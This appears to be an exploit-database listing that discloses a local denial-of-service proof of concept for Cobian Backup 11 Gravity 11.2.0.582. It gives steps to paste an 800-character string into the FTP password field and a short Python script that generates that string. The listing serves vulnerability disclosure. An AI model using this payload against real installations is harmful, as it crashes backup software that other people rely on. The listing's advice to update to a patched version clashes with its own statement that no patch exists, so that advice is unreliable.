Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)

vendor:

Cobian Backup 11 Gravity

by:

Luis Martinez

7.5

CVSS

HIGH

Denial of Service (DoS)

415

CWE

Product Name: Cobian Backup 11 Gravity

Affected Version From: 11.2.0.582

Affected Version To: 11.2.0.582

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64

2022

Cobian Backup 11 Gravity 11.2.0.582 – ‘Password’ Denial of Service (PoC)

This exploit is a proof of concept for a Denial of Service (DoS) vulnerability in Cobian Backup 11 Gravity version 11.2.0.582. By providing a large string as the password, the application crashes, causing a denial of service.

Mitigation:

Update to a patched version of Cobian Backup that addresses this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Backup_11.2.0.582.py
# 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard
# 3.- Open "Cobian Backup 11 Gravity User Interface"
# 4.- Task -> "New task"
# 5.- File -> Source "Add" -> FTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 21
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Ok
# 11.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 800
f = open ("Cobian_Backup_11.2.0.582.txt", "w")
f.write(buffer)
f.close()